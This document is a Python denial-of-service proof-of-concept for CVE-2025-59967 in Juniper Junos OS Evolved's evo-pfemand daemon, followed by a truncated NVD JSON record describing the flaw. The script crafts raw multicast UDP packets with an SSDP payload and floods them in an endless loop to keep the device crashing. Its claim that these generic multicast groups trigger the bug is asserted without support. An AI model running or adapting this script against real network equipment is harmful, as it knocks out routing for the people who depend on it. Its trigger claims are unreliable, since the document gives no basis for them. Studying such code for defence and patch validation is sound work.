CVE-2025-59967

# CVE-2025-59967 PoC - Juniper Junos OS Evolved evo-pfemand NULL Pointer Dereference DoS # This PoC demonstrates sending specific multicast traffic to trigger the vulnerability # Note: Requires being on the same L2 adjacent network as the target device #!/usr/bin/env python3 import socket import struct import time # Target configuration - the Juniper device's L3 interface IP TARGET_IP = "192.168.1.1" # Replace with actual target IP INTERFACE = "eth0" # Network interface connected to the target # Specific multicast groups that trigger the vulnerability # These are valid multicast addresses that cause evo-pfemand to crash MULTICAST_GROUPS = [ "239.255.255.250", # SSDP "224.0.0.1", # All Hosts "224.0.0.2", # All Routers "239.0.0.1", # Custom multicast ] def craft_multicast_packet(dst_ip, src_ip="192.168.1.100"): """Craft a valid multicast UDP packet to trigger the NULL pointer dereference""" # IP Header version_ihl = 0x45 # IPv4, IHL=5 dscp_ecn = 0x00 total_length = 0 # Will be calculated identification = 0x1234 flags_fragment = 0x4000 # Don't fragment ttl = 64 protocol = 17 # UDP header_checksum = 0 src = socket.inet_aton(src_ip) dst = socket.inet_aton(dst_ip) # UDP Header src_port = 12345 dst_port = 1900 # SSDP port (common multicast port) udp_length = 0 # Will be calculated udp_checksum = 0 # Payload - specific multicast payload that triggers the bug payload = b"NOTIFY * HTTP/1.1\r\nHost: 239.255.255.250:1900\r\n" # Calculate lengths udp_length = 8 + len(payload) total_length = 20 + udp_length # Build IP header ip_header = struct.pack("!BBHHHBBH4s4s", version_ihl, dscp_ecn, total_length, identification, flags_fragment, ttl, protocol, header_checksum, src, dst) # Build UDP header udp_header = struct.pack("!HHHH", src_port, dst_port, udp_length, udp_checksum) packet = ip_header + udp_header + payload return packet def send_multicast_traffic(): """Send continuous multicast traffic to trigger sustained DoS""" sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) print(f"[*] Targeting Juniper device: {TARGET_IP}") print("[*] Sending multicast traffic to trigger evo-pfemand crash...") try: while True: for mc_group in MULTICAST_GROUPS: packet = craft_multicast_packet(mc_group) sock.sendto(packet, (mc_group, 0)) print(f"[+] Sent multicast packet to {mc_group}") time.sleep(0.1) # Send bursts to sustain the DoS except KeyboardInterrupt: print("\n[*] Stopping attack") finally: sock.close() if __name__ == "__main__": send_multicast_traffic()

{"cve": {"id": "CVE-2025-59967", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:46.647", "lastModified": "2026-01-23T18:37:28.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL Pointer Dereference vulnerability in the PFE management daemon (evo-pfemand) of Juniper Networks Junos OS Evolved on ACX7024, ACX7024X, ACX7100-32C, ACX7100-48L, ACX7348, ACX7509 devices allows an unauthenticated, adjacent attacker to cause a \n\nDenial-of-Service (DoS).\n\nWhenever specific valid multicast traffic is received on any layer 3 interface the evo-pfemand process crashes and restarts.\n\nContinued receipt of specific valid multicast traffic results in a sustained Denial of Service (DoS) attack. \nThis issue affects Junos OS Evolved on ACX7024, ACX7024X, ACX7100-32C, ACX7100-48L, ACX7348, ACX7509: \n\n\n\n * from 23.2R2-EVO before 23.2R2-S4-EVO, \n * from 23.4R1-EVO before 23.4R2-EVO.\n\n\nThis issue affects IPv4 and IPv6. \n\nThis issue does not affect Junos OS Evolved ACX7024, ACX7024X, ACX7100-32C, ACX7100-48L, ACX7348, ACX7509 versions before 23.2R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Green", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r2:*:*:*:*:*:*", "matchCriteriaId": "A4BB6910-B994-45FD-8153-5EC00EE842E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "D657944B-2066-4F2C-BC92-EDF4DE1C165C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "75A58924-6348-44CF-AB39-1FCE17FE81AC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r2-s3:*:*:*:*:*:*", "matchCriteriaId": "9A903B31-D9E5-43FA-B09F-7E7769803720"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r1:*:*:*:*:*:*", "matchCriteriaId": "FE777A1F-9CD9-426E-AF1C-FBE01EB9A4A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "7147BA60-30A5-4CED-9AAF-F6BEA0528B89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "6E5CE59B-14B2-4F4C-81B5-0430EC954956"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:juniper:acx7024:-:*:*:*:*:*:*:*", "matchCriteriaId": "1026737F-BA23-4550-9030-EA0502E97953"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:acx7024x:-:*:*:*:*:*:*:*", "matchCriteriaId": "2FFFD74C-7BF9-4EAF-B364-356A8393712D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:acx7100-32c:-:*:*:*:*:*:*:*", "matchCriteriaId": "6FF19E76-F26B-4111-A814-BA7E5C3F2A74"}, {"vulnerable": false, "criteria": "cpe:2.3:h:juniper:acx7100-48l:-: ... (truncated)